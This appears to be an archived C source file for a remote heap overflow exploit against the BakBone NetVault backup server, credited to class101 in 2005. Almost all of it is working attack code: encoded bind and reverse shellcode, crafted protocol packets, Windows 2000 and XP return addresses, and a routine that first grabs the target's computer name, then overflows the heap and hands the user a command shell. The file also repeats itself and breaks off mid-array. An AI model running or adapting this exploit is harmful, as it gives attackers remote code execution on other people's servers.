home *** CD-ROM | disk | FTP | other *** search
- /*
- for more informations class101.org/netv-remhbof.pdf
- */
-
- #include <stdio.h>
- #include <string.h>
- #ifdef WIN32
- #include "winsock2.h"
- #pragma comment(lib, "ws2_32")
- #else
- #include <sys/socket.h>
- #include <sys/types.h>
- #include <netinet/in.h>
- #include <netinet/in_systm.h>
- #include <netinet/ip.h>
- #include <netdb.h>
- #include <arpa/inet.h>
- #include <unistd.h>
- #include <stdlib.h>
- #include <fcntl.h>
- #endif
-
- char scode1[]=
- "\x33\xC9\x83\xE9"
- "\xAF\xD9\xEE\xD9\x74\x24\xF4\x5B\x81\x73\x13\xBB"
- "\x1E\xD3\x6A\x83\xEB\xFC\xE2\xF4\x47\x74\x38\x25\x53\xE7\x2C\x95"
- "\x44\x7E\x58\x06\x9F\x3A\x58\x2F\x87\x95\xAF\x6F\xC3\x1F\x3C\xE1"
- "\xF4\x06\x58\x35\x9B\x1F\x38\x89\x8B\x57\x58\x5E\x30\x1F\x3D\x5B"
- "\x7B\x87\x7F\xEE\x7B\x6A\xD4\xAB\x71\x13\xD2\xA8\x50\xEA\xE8\x3E"
- "\x9F\x36\xA6\x89\x30\x41\xF7\x6B\x50\x78\x58\x66\xF0\x95\x8C\x76"
- "\xBA\xF5\xD0\x46\x30\x97\xBF\x4E\xA7\x7F\x10\x5B\x7B\x7A\x58\x2A"
- "\x8B\x95\x93\x66\x30\x6E\xCF\xC7\x30\x5E\xDB\x34\xD3\x90\x9D\x64"
- "\x57\x4E\x2C\xBC\x8A\xC5\xB5\x39\xDD\x76\xE0\x58\xD3\x69\xA0\x58"
- "\xE4\x4A\x2C\xBA\xD3\xD5\x3E\x96\x80\x4E\x2C\xBC\xE4\x97\x36\x0C"
- "\x3A\xF3\xDB\x68\xEE\x74\xD1\x95\x6B\x76\x0A\x63\x4E\xB3\x84\x95"
- "\x6D\x4D\x80\x39\xE8\x4D\x90\x39\xF8\x4D\x2C\xBA\xDD\x76\xD3\x0F"
- "\xDD\x4D\x5A\x8B\x2E\x76\x77\x70\xCB\xD9\x84\x95\x6D\x74\xC3\x3B"
- "\xEE\xE1\x03\x02\x1F\xB3\xFD\x83\xEC\xE1\x05\x39\xEE\xE1\x03\x02"
- "\x5E\x57\x55\x23\xEC\xE1\x05\x3A\xEF\x4A\x86\x95\x6B\x8D\xBB\x8D"
- "\xC2\xD8\xAA\x3D\x44\xC8\x86\x95\x6B\x78\xB9\x0E\xDD\x76\xB0\x07"
- "\x32\xFB\xB9\x3A\xE2\x37\x1F\xE3\x5C\x74\x97\xE3\x59\x2F\x13\x99"
- "\x11\xE0\x91\x47\x45\x5C\xFF\xF9\x36\x64\xEB\xC1\x10\xB5\xBB\x18"
- "\x45\xAD\xC5\x95\xCE\x5A\x2C\xBC\xE0\x49\x81\x3B\xEA\x4F\xB9\x6B"
- "\xEA\x4F\x86\x3B\x44\xCE\xBB\xC7\x62\x1B\x1D\x39\x44\xC8\xB9\x95"
- "\x44\x29\x2C\xBA\x30\x49\x2F\xE9\x7F\x7A\x2C\xBC\xE9\xE1\x03\x02"
- "\x54\xD0\x33\x0A\xE8\xE1\x05\x95\x6B\x1E\xD3\x6A";
-
-
- char scode2[]=
- /*original vlad902's reverse shellcode from metasploit.com
- NOT xored, modded by class101 for ca's xpl0it to remove the common badchar "\x20"
- original bytes + modded = 291 + 3 = 294 bytes reverse shellcode v1.31*/
- "\xFC\x6A\xEB\x52" /*modded adjusting jump*/
- "\xE8\xF9\xFF\xFF\xFF\x60\x8B\x6C\x24\x24\x8B\x45\x3C\x8B\x7C\x05"
- "\x78\x01\xEF"
- "\x83\xC7\x01" /*modded, adding 1 to edi*/
- "\x8B\x4F\x17" /*modded, adjusting ecx*/
- "\x8B\x5F\x1F" /*modded, adjusting ebx, "\x20" out, yeahouu ;>*/
- "\x01\xEB\xE3\x30\x49\x8B\x34\x8B\x01\xEE\x31\xC0\x99\xAC\x84\xC0"
- "\x74\x07\xC1\xCA\x0D\x01\xC2\xEB\xF4\x3B\x54\x24\x28\x75\xE3"
- "\x8B\x5F\x23" /*modded, adjusting ebx*/
- "\x01\xEB\x66\x8B\x0C\x4B"
- "\x8B\x5F\x1B" /*modded, adjusting ebx*/
- "\x01\xEB\x03\x2C\x8B\x89\x6C\x24\x1C\x61\xC3\x31\xC0\x64\x8B\x40"
- "\x30\x8B\x40\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\x5E\x68\x8E\x4E\x0E"
- "\xEC\x50\xFF\xD6\x31\xDB\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32"
- "\x5F\x54\xFF\xD0\x68\xCB\xED\xFC\x3B\x50\xFF\xD6\x5F\x89\xE5\x66"
- "\x81\xED\x08\x02\x55\x6A\x02\xFF\xD0\x68\xD9\x09\xF5\xAD\x57\xFF"
- "\xD6\x53\x53\x53\x53\x43\x53\x43\x53\xFF\xD0\x68\x00\x00\x00\x00"
- "\x66\x68\x00\x00\x66\x53\x89\xE1\x95\x68\xEC\xF9\xAA\x60\x57\xFF"
- "\xD6\x6A\x10\x51\x55\xFF\xD0\x66\x6A\x64\x66\x68\x63\x6D\x6A\x50"
- "\x59\x29\xCC\x89\xE7\x6A\x44\x89\xE2\x31\xC0\xF3\xAA\x95\x89\xFD"
- "\xFE\x42\x2D\xFE\x42\x2C\x8D\x7A\x38\xAB\xAB\xAB\x68\x72\xFE\xB3"
- "\x16\xFF\x75\x28\xFF\xD6\x5B\x57\x52\x51\x51\x51\x6A\x01\x51\x51"
- "\x55\x51\xFF\xD0\x68\xAD\xD9\x05\xCE\x53\xFF\xD6\x6A\xFF\xFF\x37"
- "\xFF\xD0\x68\xE7\x79\xC6\x79\xFF\x75\x04\xFF\xD6\xFF\x77\xFC\xFF"
- "\xD0\x68\xEF\xCE\xE0\x60\x53\xFF\xD6\xFF\xD0";
-
-
- char scodeA[] =
- "\x11\x03\x00\x00\x01\xCB\x22\x77\xC9\x17\x00\x00\x00\x69\x3B\x69"
- "\x3B\x69\x3B\x69\x3B\x69\x3B\x69\x3B\x69\x3B\x69\x3B\x69\x3B\x69"
- "\x3B\x73\x3B\x00\x00\x00\x00\x00\xC0\x00\x00\x00\x0C\x58\x3C\x42"
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"
- "\x03\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00";
-
- char scodeB[] =
- "\x00\x51\x02\x00\x00\x00\x00\x00\x00\x01\x03\x05\x27\xCA\x07\x00"
- "\x00\x00\x73\x3B\x62\x3B\x6F\x3B\x00";
-
- char scodeC[] =
- "\x00\x00\x02\x01\x00\x00\x00\x8F\xD0\xF0\xCA\x0B\x00\x00"
- "\x00\x69\x3B\x62\x3B\x6F\x3B\x6F\x3B\x7A\x3B\x00\x11\x57\x3C\x42"
- "\x00\x01\xB9\xF9\xA2\xC8\x00\x00\x00\x00\x03\x00\x00\x00\x00\x01"
- "\xA5\x97\xF0\xCA\x05\x00\x00\x00\x6E\x33\x32\x3B\x00\x20\x00\x00"
- "\x00\x10\x02\x4E\x3F\xAC\x14\xCC\x0A\x00\x00\x00\x00\x00\x00\x00"
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
- "\x00\x01\xA5\x97\xF0\xCA\x05\x00\x00\x00\x6E\x33\x32\x3B\x00\x20"
- "\x00\x00\x00\x10\x02\x4E\x3F\xC0\xA8\xEA\xEB\x00\x00\x00\x00\x00"
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
- "\x00\x00\x00\x01\xA5\x97\xF0\xCA\x05\x00\x00\x00\x6E\x33\x32\x3B"
- "\x00\x20\x00\x00\x00\x10\x02\x4E\x3F\xC2\x97\x2C\xD3\x00\x00\x00"
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
- "\x00\x00\x00\x00\x00\xB9\xF9\xA2\xC8\x02\x02\x00\x00\x00\xA5\x97"
- "\xF0\xCA\x05\x00\x00\x00\x6E\x33\x32\x3B\x00\x20\x00\x00\x00\x04"
- "\x02\x4E\x3F\xAC\x14\xCC\x0A\xB0\xFC\xE2\x00\x00\x00\x00\x00\xEC"
- "\xFA\x8E\x01\xA4\x6B\x41\x00\xE4\xFA\x8E\x01\xFF\xFF\xFF\xFF\x01"
- "\x02\x00\x00\x00";
-
- char scodeD[] =
- "\x00\x06\x00\x00\x00\x0B\x00\x00\x00\x05\x00\x00\x00\x54"
- "\x79\x70\x65\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00"
- "\x77\x69\x6E\x6E\x74\x00\x12\x00\x00\x00\x55\x44\x50\x20\x46\x72"
- "\x61\x67\x6D\x65\x6E\x74\x20\x53\x69\x7A\x65\x00\x01\x00\x00\x00"
- "\x01\x00\x00\x00\x05\x00\x00\x00\x31\x34\x30\x30\x00\x07\x00\x00"
- "\x00\x53\x65\x72\x76\x65\x72\x00\x01\x00\x00\x00\x01\x00\x00\x00"
- "\x05\x00\x00\x00\x54\x52\x55\x45\x00\x0C\x00\x00\x00\x44\x65\x73"
- "\x63\x72\x69\x70\x74\x69\x6F\x6E\x00\x00\x00\x00\x00\x01\x00\x00"
- "\x00\x0A\x00\x00\x00\x4E\x56\x56\x65\x72\x73\x69\x6F\x6E\x00\x01"
- "\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x37\x30\x33\x30\x00"
- "\x0D\x00\x00\x00\x4E\x56\x42\x75\x69\x6C\x64\x4C\x65\x76\x65\x6C"
- "\x00\x01\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x33\x37\x00";
-
- char grabcpname[] =
- "\xC9\x00\x00\x00\x01\xCB\x22\x77\xC9\x17\x00\x00\x00\x69\x3B\x69"
- "\x3B\x69\x3B\x69\x3B\x69\x3B\x69\x3B\x69\x3B\x69\x3B\x69\x3B\x69"
- "\x3B\x73\x3B\x00\x00\x00\x00\x00\xC0\x00\x00\x00\x00\x00\x00\x00"
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00"
- "\x03\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x0B\x00\x00\x00"
- "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x00\x00\x00\x00\x00\x00"
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
- "\x09\x00\x00\x00\x00\x00\x00\x00\x00";
-
- char payload[1024],payload2[20000000],recvbuf[1024],ver2[1024],
- cpname[1024],sz[1024],szb[1024],szb2[1024];
- int tot,tot2,l00p=0;
-
- char sip[3],spo[1],pad[]="\xEB\x0A",pad2[]="\xE9\xF3\xFD\xFF\xFF";
- char ret1[]="\x7E\x6D\x03\x75"; //call dword [esi+4C], ws2_32.dll, w2k SP4 EN
- char ret1c[]="\xBD\x9B\x36\x7C"; //call dword [edi+74], MSVCR71.dll, XP SP1a-1-0 EN
- char ret2[]="\xF0\xA1\x5C\x7C"; //UEF (UnHandledExceptionFilter) w2k sp4 EN
- char ret4[]="\xB4\x73\xED\x77"; //UEF XP SP1a-1-0 EN
- char padA[]="\x00\x00\x00";
- char szc[]="\xFF\xFF";
-
- // rtlmethod char repair[]="\xC7\x40\x89\x60\x20\xF8\x77"; repairing RtlEnterCriticalSection on 2k SP4
- //you will prolly need to repair this repair[] for your os :>
- //I did it quickly: mov dword ptr [eax-77],77F82060
- //for litchfield this method is reliable due to the fixed address 0x7FFDF020
- //for me that's a crap method like others known heap exploitations
- //because you realiably repair the functions across all nt based os?, and where to realiably jump...,
- //and also the call to drwtsn32, right before ExitProcess(), acts as a breakpoint, and
- //your shellcode will be executed once 'OK' or 'CANCEL' clicked. At least this is still a 'fun' ExitProcess() :)
-
- #ifdef WIN32
- WSADATA wsadata;
- #endif
-
- void ver();
- void usage(char* us);
- void sl(int time);
-
- int main(int argc,char *argv[])
- {
- ver();
- int check1, check2, rc, i, j, k;
- unsigned long gip;
- unsigned short gport;
- char *what, *where, *os;
- loop:
- if (argc>6||argc<3||atoi(argv[1])>2||atoi(argv[1])<1){usage(argv[0]);return -1;}
- if (argc==5){usage(argv[0]);return -1;}
- if (strlen(argv[2])<7){usage(argv[0]);return -1;}
- if (argc==6)
- {
- if (strlen(argv[4])<7){usage(argv[0]);return -1;}
- }
- #ifndef WIN32
- if (argc==6)
- {
- gip=inet_addr(argv[4])^(long)0x00000000;
- gport=htons(atoi(argv[5]))^(short)0x0000;
- memcpy(&sip[0], &gip, 4);memcpy(&spo[0], &gport, 2);
- check1=strlen(&sip[0]);check2=strlen(&spo[0]);
- if (check1 == 0||check1 == 1||check1 == 2||check1 == 3){
- printf("[+] error, the IP has a null byte in hex...\n");return -1;}
- if (check2 != 2){printf("[+] error, the PORT has a null byte in hex...\n");return -1;}
- }
- #define Sleep sleep
- #define SOCKET int
- #define closesocket(s) close(s)
- #else
- if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){printf("[+] wsastartup error\n");
- return -1;}
- if (argc==6)
- {
- gip=inet_addr(argv[4])^(ULONG)0x00000000;
- gport=htons(atoi(argv[5]))^(USHORT)0x0000;
- memcpy(&sip[0], &gip, 4);memcpy(&spo[0], &gport, 2);
- check1=strlen(&sip[0]);check2=strlen(&spo[0]);
- if (check1 == 0||check1 == 1||check1 == 2||check1 == 3){
- printf("[+] error, the IP has a null byte in hex...\n");return -1;}
- if (check2 != 2){printf("[+] error, the PORT has a null byte in hex...\n");return -1;}
- }
- #endif
- int ip=htonl(inet_addr(argv[2])), port;
- if (argc==4||argc==6){port=atoi(argv[3]);} else port=20031;
- SOCKET s;fd_set mask;struct timeval timeout; struct sockaddr_in server;
- s=socket(AF_INET,SOCK_STREAM,0);
- if (s==-1){printf("[+] socket() error\n");return -1;}
- if (atoi(argv[1]) == 1){what=ret1;where=ret2;os="Win2k SP4 Server English\n[+]
- Win2k SP4 Pro English\n";}
- if (atoi(argv[1]) == 2){what=ret1c;where=ret4;os="WinXP SP0 Pro. English\n[+]
- WinXP SP1 Pro. English\n[+] WinXP SP1a Pro. English\n";}
- if (l00p==0){printf("[+] TARGET: %s\n",os);sl(1);}
- server.sin_family=AF_INET;
- server.sin_addr.s_addr=htonl(ip);
- server.sin_port=htons(port);
- connect(s,( struct sockaddr *)&server,sizeof(server));
- timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
- switch(select(s+1,NULL,&mask,NULL,&timeout))
- {
- case -1: {printf("[+] select() error\n");closesocket(s);return -1;}
- case 0: {printf("[+] connect() error\n");closesocket(s);return -1;}
- default:
- if(FD_ISSET(s,&mask))
- {
- if (l00p==0)
- {
- printf("[+] connection 1: grabbing computername via netvault...\n");
- sl(2);
- send(s,grabcpname,sizeof(grabcpname)-1,0);
- rc = recv(s,recvbuf,sizeof(recvbuf),0);
- if (rc==-1||rc<400||recvbuf[13]!=105&&recvbuf[14]!=59){printf("[+] not netvault or
- patched, aborting..\n");return -1;}
- else if (rc==0){printf("[+] nothing received, not netvault or patched, aborting..\n");return -1;}
- else printf("[+] analyzing packets, sorting computername\n");
- sl(2);
- printf("[+] bufsize: %d\n",rc);sl(1);
- for (i=80,j=0;recvbuf[i]!=0;i++,j++)
- {
- memset(cpname+j,recvbuf[i],1);
- }
- memset(sz,strlen(cpname)+1,1);
- memset(ver2,recvbuf[rc-37],1);memset(ver2+1,0x2E,1);
- memset(ver2+2,recvbuf[rc-35],1);memset(ver2+3,0x2E,1);
- memset(ver2+4,recvbuf[rc-34],1);
- printf("[+] cmpname: %s\n",cpname);sl(1);
- printf("[+] version: %s\n",ver2);sl(1);l00p++;
- closesocket(s);
- #ifdef WIN32
- WSACleanup();
- #endif
- goto loop;
- }
- printf("[+]\n[+] connection 2: modding payload regarding computername and length\n");sl(1);
- printf("[+] loading attack\n");sl(1);
- /*the cpname length is important, that's why we reajust EAX and ECX
- function of cpnamelength.*/
- k=7-strlen(cpname);
- memset(payload,0x41,1);
- // rtlmethod memset(payload2,0x90,k+32417); rtl
- // rtlmethod memcpy(payload2+k+32417,"\x1C\xF0\xFD\x7F",4);
- // rtlmethod memcpy(payload2+k+32421,"\x1A\x9E\xEA\x00",4);
- // rtlmethod memcpy(payload2+k+31902, repair, 7);
- memset(payload2,0x90,k+35431);
- memcpy(payload2+k+32413,pad,2);memcpy(payload2+k+32417,what,4);
- memcpy(payload2+k+32421,where,4);memcpy(payload2+k+32426,pad2,5);
- if (argc==6)
- {
- memcpy(&scode2[167], &gip, 4);
- memcpy(&scode2[173], &gport, 2);
- memcpy(payload2+k+31914,scode2,strlen(scode2));
- }
- else memcpy(payload2+k+31914,scode1,strlen(scode1));
- tot=sizeof(padA)-1+sizeof(scodeA)-1+sizeof(scodeB)-1+sizeof(scodeC)-1+
- sizeof(scodeD)-1+strlen(payload)+strlen(payload2)+strlen(sz)+strlen(cpname);
- tot2=tot-192;
- memcpy(szb,&tot,2);memcpy(&scodeA[0],&szb,strlen(szb));
- memcpy(szb2,&tot2,2);memcpy(&scodeB[1],&szb2,strlen(szb2));
- memcpy(scodeC+254,szc,2);
- printf("[+] sh0uting the heap!\n");sl(3);
- if (send(s,scodeA,sizeof(scodeA)-1,0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");
- return -1;}
- if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");
- return -1;}
- if (send(s,scodeB,sizeof(scodeB)-1,0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");
- return -1;}
- if (send(s,sz,strlen(sz),0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");
- return -1;}
- if (send(s,padA,sizeof(padA)-1,0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");
- return -1;}
- if (send(s,cpname,strlen(cpname),0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");
- return -1;}
- if (send(s,scodeC,sizeof(scodeC)-1,0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");
- return -1;}
- if (send(s,payload2,strlen(payload2),0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");
- return -1;}
- sl(6);
- printf("[+]\n[+] size of payload: %d\n",tot);
- if (argc==6){printf("[+] payload sent, look at your listener, you should get a shell\n");}
- else printf("[+] payload sent, use telnet %s:101 to get a shell\n",inet_ntoa(server.sin_addr));
- return 0;
- }
- }
- closesocket(s);
- #ifdef WIN32
- WSACleanup();
- #endif
- return 0;
- }
-
-
- void usage(char* us)
- {
-
- printf(" \n");
- printf("[+] . 101_netvault.exe Target VulnIP (bind mode) \n");
- printf("[+] . 101_netvault.exe Target VulnIP VulnPORT (bind mode) \n");
- printf("[+] . 101_netvault.exe Target VulnIP VulnPORT GayIP GayPORT reverse mode) \n");
- printf("TARGETS: \n");
- printf("[+] 1. Win2k SP4 Server English (*) - v5.0.2195 \n");
- printf("[+] 1. Win2k SP4 Pro English (*) - v5.0.2195 \n");
- printf("[+] 2. WinXP SP0 Pro. English - v5.1.2600 \n");
- printf("[+] 2. WinXP SP1 Pro. English (*) - v5.1.2600 \n");
- printf("[+] 2. WinXP SP1a Pro. English (*) - v5.1.2600 \n");
- printf("NOTE: \n");
- printf("The exploit bind a cmdshell port 101 or \n");
- printf("reverse a cmdshell on your listener. \n");
- printf("A wildcard (*) mean tested working, else, supposed working. \n");
- printf("A symbol (-) mean all. \n");
- printf(" Compilation msvc6, cygwin, Linux. \n");
- printf(" \n");
- return;
- }
-
- void ver()
- {
- printf(" \n");
- printf("============================[v0.1]====\n");
- printf("=====BakBone NetVault, Backup Server===============\n");
- printf("=====Clientname, Remote Heap Overflow Exploit==========\n");
- printf("====coded by class101======[Hat-Squad.com 2005]=====\n");
- printf("============================================\n");
- printf(" \n");
- }
-
- void sl(int time)
- {
- #ifdef WIN32
- Sleep(time*1000);
- #else
- Sleep(time);
- #endif
- }
-
- /*
- for more informations class101.org/netv-remhbof.pdf
- */
-
- #include <stdio.h>
- #include <string.h>
- #ifdef WIN32
- #include "winsock2.h"
- #pragma comment(lib, "ws2_32")
- #else
- #include <sys/socket.h>
- #include <sys/types.h>
- #include <netinet/in.h>
- #include <netinet/in_systm.h>
- #include <netinet/ip.h>
- #include <netdb.h>
- #include <arpa/inet.h>
- #include <unistd.h>
- #include <stdlib.h>
- #include <fcntl.h>
- #endif
-
- char scode1[]=
- "\x33\xC9\x83\xE9"
- "\xAF\xD9\xEE\xD9\x74\x24\xF4\x5B\x81\x73\x13\xBB"
- "\x1E\xD3\x6A\x83\xEB\xFC\xE2\xF4\x47\x74\x38\x25\x53\xE7\x2C\x95"
- "\x44\x7E\x58\x06\x9F\x3A\x58\x2F\x87\x95\xAF\x6F\xC3\x1F\x3C\xE1"
- "\xF4\x06\x58\x35\x9B\x1F\x38\x89\x8B\x57\x58\x5E\x30\x1F\x3D\x5B"
- "\x7B\x87\x7F\xEE\x7B\x6A\xD4\xAB\x71\x13\xD2\xA8\x50\xEA\xE8\x3E"
- "\x9F\x36\xA6\x89\x30\x41\xF7\x6B\x50\x78\x58\x66\xF0\x95\x8C\x76"
- "\xBA\xF5\xD0\x46\x30\x97\xBF\x4E\xA7\x7F\x10\x5B\x7B\x7A\x58\x2A"
- "\x8B\x95\x93\x66\x30\x6E\xCF\xC7\x30\x5E\xDB\x34\xD3\x90\x9D\x64"
- "\x57\x4E\x2C\xBC\x8A\xC5\xB5\x39\xDD\x76\xE0\x58\xD3\x69\xA0\x58"
- "\xE4\x4A\x2C\xBA\xD3\xD5\x3E\x96\x80\x4E\x2C\xBC\xE4\x97\x36\x0C"
- "\x3A\xF3\xDB\x68\xEE\x74\xD1\x95\x6B\x76\x0A\x63\x4E\xB3\x84\x95"
- "\x6D\x4D\x80\x39\xE8\x4D\x90\x39\xF8\x4D\x2C\xBA\xDD\x76\xD3\x0F"
- "\xDD\x4D\x5A\x8B\x2E\x76\x77\x70\xCB\xD9\x84\x95\x6D\x74\xC3\x3B"
- "\xEE\xE1\x03\x02\x1F\xB3\xFD\x83\xEC\xE1\x05\x39\xEE\xE1\x03\x02"
- "\x5E\x57\x55\x23\xEC\xE1\x05\x3A\xEF\x4A\x86\x95\x6B\x8D\xBB\x8D"
- "\xC2\xD8\xAA\x3D\x44\xC8\x86\x95\x6B\x78\xB9\x0E\xDD\x76\xB0\x07"
- "\x32\xFB\xB9\x3A\xE2\x37\x1F\xE3\x5C\x74\x97\xE3\x59\x2F\x13\x99"
- "\x11\xE0\x91\x47\x45\x5C\xFF\xF9\x36\x64\xEB\xC1\x10\xB5\xBB\x18"
- "\x45\xAD\xC5\x95\xCE\x5A\x2C\xBC\xE0\x49\x81\x3B\xEA\x4F\xB9\x6B"
- "\xEA\x4F\x86\x3B\x44\xCE\xBB\xC7\x62\x1B\x1D\x39\x44\xC8\xB9\x95"
- "\x44\x29\x2C\xBA\x30\x49\x2F\xE9\x7F\x7A\x2C\xBC\xE9\xE1\x03\x02"
- "\x54\xD0\x33\x0A\xE8\xE1\x05\x95\x6B\x1E\xD3\x6A";
-
-
- char scode2[]=
- /*original vlad902's reverse shellcode from metasploit.com
- NOT xored, modded by class101 for ca's xpl0it to remove the common badchar "\x20"
- original bytes + modded = 291 + 3 = 294 bytes reverse shellcode v1.31*/
- "\xFC\x6A\xEB\x52" /*modded adjusting jump*/
- "\xE8\xF9\xFF\xFF\xFF\x60\x8B\x6C\x24\x24\x8B\x45\x3C\x8B\x7C\x05"
- "\x78\x01\xEF"
- "\x83\xC7\x01" /*modded, adding 1 to edi*/
- "\x8B\x4F\x17" /*modded, adjusting ecx*/
- "\x8B\x5F\x1F" /*modded, adjusting ebx, "\x20" out, yeahouu ;>*/
- "\x01\xEB\xE3\x30\x49\x8B\x34\x8B\x01\xEE\x31\xC0\x99\xAC\x84\xC0"
- "\x74\x07\xC1\xCA\x0D\x01\xC2\xEB\xF4\x3B\x54\x24\x28\x75\xE3"
- "\x8B\x5F\x23" /*modded, adjusting ebx*/
- "\x01\xEB\x66\x8B\x0C\x4B"
- "\x8B\x5F\x1B" /*modded, adjusting ebx*/
- "\x01\xEB\x03\x2C\x8B\x89\x6C\x24\x1C\x61\xC3\x31\xC0\x64\x8B\x40"
- "\x30\x8B\x40\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\x5E\x68\x8E\x4E\x0E"
- "\xEC\x50\xFF\xD6\x31\xDB\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32"
- "\x5F\x54\xFF\xD0\x68\xCB\xED\xFC\x3B\x50\xFF\xD6\x5F\x89\xE5\x66"
- "\x81\xED\x08\x02\x55\x6A\x02\xFF\xD0\x68\xD9\x09\xF5\xAD\x57\xFF"
- "\xD6\x53\x53\x53\x53\x43\x53\x43\x53\xFF\xD0\x68\x00\x00\x00\x00"
- "\x66\x68\x00\x00\x66\x53\x89\xE1\x95\x68\xEC\xF9\xAA\x60\x57\xFF"
- "\xD6\x6A\x10\x51\x55\xFF\xD0\x66\x6A\x64\x66\x68\x63\x6D\x6A\x50"
- "\x59\x29\xCC\x89\xE7\x6A\x44\x89\xE2\x31\xC0\xF3\xAA\x95\x89\xFD"
- "\xFE\x42\x2D\xFE\x42\x2C\x8D\x7A\x38\xAB\xAB\xAB\x68\x72\xFE\xB3"
- "\x16\xFF\x75\x28\xFF\xD6\x5B\x57\x52\x51\x51\x51\x6A\x01\x51\x51"
- "\x55\x51\xFF\xD0\x68\xAD\xD9\x05\xCE\x53\xFF\xD6\x6A\xFF\xFF\x37"
- "\xFF\xD0\x68\xE7\x79\xC6\x79\xFF\x75\x04\xFF\xD6\xFF\x77\xFC\xFF"
- "\xD0\x68\xEF\xCE\xE0\x60\x53\xFF\xD6\xFF\xD0";
-
-
- char scodeA[] =
- "\x11\x03\x00\x00\x01\xCB\x22\x77\xC9\x17\x00\x00\x00\x69\x3B\x69"
- "\x3B\x69\x3B\x69\x3B\x69\x3B\x69\x3B\x69\x3B\x69\x3B\x69\x3B\x69"
- "\x3B\x73\x3B\x00\x00\x00\x00\x00\xC0\x00\x00\x00\x0C\x58\x3C\x42"
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"
- "\x03\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00";
-
- char scodeB[] =
- "\x00\x51\x02\x00\x00\x00\x00\x00\x00\x01\x03\x05\x27\xCA\x07\x00"
- "\x00\x00\x73\x3B\x62\x3B\x6F\x3B\x00";
-
- char scodeC[] =
- "\x00\x00\x02\x01\x00\x00\x00\x8F\xD0\xF0\xCA\x0B\x00\x00"
- "\x00\x69\x3B\x62\x3B\x6F\x3B\x6F\x3B\x7A\x3B\x00\x11\x57\x3C\x42"
- "\x00\x01\xB9\xF9\xA2\xC8\x00\x00\x00\x00\x03\x00\x00\x00\x00\x01"
- "\xA5\x97\xF0\xCA\x05\x00\x00\x00\x6E\x33\x32\x3B\x00\x20\x00\x00"
- "\x00\x10\x02\x4E\x3F\xAC\x14\xCC\x0A\x00\x00\x00\x00\x00\x00\x00"
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
- "\x00\x01\xA5\x97\xF0\xCA\x05\x00\x00\x00\x6E\x33\x32\x3B\x00\x20"
- "\x00\x00\x00\x10\x02\x4E\x3F\xC0\xA8\xEA\xEB\x00\x00\x00\x00\x00"
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
- "\x00\x00\x00\x01\xA5\x97\xF0\xCA\x05\x00\x00\x00\x6E\x33\x32\x3B"
- "\x00\x20\x00\x00\x00\x10\x02\x4E\x3F\xC2\x97\x2C\xD3\x00\x00\x00"
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
- "\x00\x00\x00\x00\x00\xB9\xF9\xA2\xC8\x02\x02\x00\x00\x00\xA5\x97"
- "\xF0\xCA\x05\x00\x00\x00\x6E\x33\x32\x3B\x00\x20\x00\x00\x00\x04"
- "\x02\x4E\x3F\xAC\x14\xCC\x0A\xB0\xFC\xE2\x00\x00\x00\x00\x00\xEC"
- "\xFA\x8E\x01\xA4\x6B\x41\x00\xE4\xFA\x8E\x01\xFF\xFF\xFF\xFF\x01"
- "\x02\x00\x00\x00";
-
- char scodeD[] =
- "\x00\x06\x00\x00\x00\x0B\x00\x00\x00\x05\x00\x00\x00\x54"
- "\x79\x70\x65\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00"
- "\x77\x69\x6E\x6E\x74\x00\x12\x00\x00\x00\x55\x44\x50\x20\x46\x72"
- "\x61\x67\x6D\x65\x6E\x74\x20\x53\x69\x7A\x65\x00\x01\x00\x00\x00"
- "\x01\x00\x00\x00\x05\x00\x00\x00\x31\x34\x30\x30\x00\x07\x00\x00"
- "\x00\x53\x65\x72\x76\x65\x72\x00\x01\x00\x00\x00\x01\x00\x00\x00"
- "\x05\x00\x00\x00\x54\x52\x55\x45\x00\x0C\x00\x00\x00\x44\x65\x73"
